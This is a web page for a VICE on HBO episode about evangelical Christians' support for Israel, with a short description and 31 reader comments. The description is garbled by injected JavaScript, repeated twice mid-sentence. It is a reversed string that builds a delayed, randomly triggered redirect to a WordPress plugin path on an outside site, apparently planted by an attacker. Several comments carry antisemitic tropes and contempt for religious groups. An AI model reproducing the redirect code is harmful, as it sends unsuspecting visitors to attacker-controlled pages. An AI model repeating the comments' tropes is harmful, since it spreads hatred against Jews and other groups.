Why Evangelical Christians Love Israel | VICE on HBO

Thomas Mortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton joined a group of born again Christians as they toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toured the Holy Land and found out the real reason why they support Israel. This is the episode from Season 2 of VICE on HBO.

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31 thoughts on “Why Evangelical Christians Love Israel | VICE on HBO”

  1. Michael Kabyle says:

    Holy shiit!!!

  2. Don says:

    Why only 1000 years? What happens after that?

  3. Liam Lyons says:

    Artist forgot that dual carriage way in his picture of the hill place that's actually the end of the world or whatever

  4. Hanif Issa says:

    Evangelical "Christians" leaders are the biggest conmen, and will go where the money is.

  5. Austin Ponsford says:

    Religion is so dumb I can’t, I’m cringing so hard at this

  6. Sam Shipley says:

    I'm Jewish and I gagged at the sight of these people.

  7. Patrick Bandy says:

    I think a more likely scenario than christians desiring the end of the world is the bible passage that states I will bless those who bless you,
    And I will curse him who curses you;
    And in you all the families of the earth shall be blessed.” Not as spectacular but is personally my motivation for Israeli support.

  8. L SEAN says:

    You gentiles will be going in to captivity christianity has nothing to do with the black massiah!
    Blacks,maxicans, native Indians are true biblical ISRAELITES you guys are wasting your money and prayers and treating the true ISRAELITES like shhhht!

  9. Hash Bloch says:

    Its is-ra-eal. Not izreal

  10. med esw says:

    Judaism is a very toxic and supremacist faith !

  11. wallid mohammed says:

    at 9:00 i have a feeling that the war he is talking about is neculer warr where more then half of the world population wil be ended im a muslim i belief in allah what if i was a christian what if i was a hindu whay if i dint belief in any god except reality well i wold still be a human and the human inside me always asks me the question why the poor being killed why the young being killed why the unborn being killed why the new born being killed…. in the end all humans have to die May Allah forgive me if im rong the last thing came in my mind that its all politics its all about money and power…. i just pry that one day it all ends its just a test in life be kind help others if u cannot then dont harm others.

  12. Gantz akira says:

    christians praying for those who killed jesus , yet do not want to convert to judaism bc they feel there the chosen ppl . christianity is the biggest joke off all.

  13. Regina Blackwell says:

    Satan is in the synagogue.

  14. Ab Aha says:

    Is this the new religion that sweeping the earth

  15. Bjarnþór says:

    modern crusades.

  16. Russell Stone says:

    They love Satan, Rev. 2:9.

  17. pinfold1000 says:

    Christianity is a doomsday cult

  18. warren lamar says:

    We Christians are on God's side and that is why we support Israel.

  19. Another Agnostic says:

    Religion = Insanity

  20. Ghost Train Haze says:

    Israel belongs to Jacob Rothschild

  21. Ismail Chavoos says:

    New International Version

    "You snakes! You brood of vipers! How will you escape being condemned to hell?

  22. Carson Young says:

    Was there really a video needed on this? Read the Bible, people

  23. Gene Cutrone says:

    I can't believe people believe this crap. Mind blown.

  24. Amanda Croft says:

    11:40 I wish the journalist had asked him what advice he had for the Christian Palestinians losing their homes. He seems to be unaware of that problem.

  25. Darin Osborne says:

    Of course, this report fails to mention the horrendous human rights violations by the Palestinians toward LBGQT members, women's equality, the protection and freedom of religious minorities and the lack of free elections.

  26. Percy elliott says:

    It is weird that these happy clappers have no regard for Palestinian Christians oppressed in this land grab. I guess at the end of the day they are driven more by their anti Islam hatred rather than their empathy for people including their christian brothers. Their beliefs about rapture are just plain nutty. They all need to see a shrink.

  27. Aries LaVey says:

    Religion just needs to die.

  28. Men In Black says:

    Because they are not religious people, they are a cult of fanatics.,

  29. Drishti Sanger says:

    Respect their religion , what about other people’s religions?

  30. Eva H says:

    The Jewish people "carried" the WHOLE Holy Bible (all 66 books) through time for ALL mankind. Yes some have turned their back on all 66 Books, but the Holy Bible still remains the WHOLE and true Word of God. They are the chosen people for that VERY reason. God's Love and character and "wants" for ALL mankind is in the Holy Bible. Read it, it is a beautiful book.

  31. VICE News says:

    Since this report, VICE has returned to the region multiple times. Check out our latest report from the deadliest day in Gaza since 2014 – http://bit.ly/2IEyc2J

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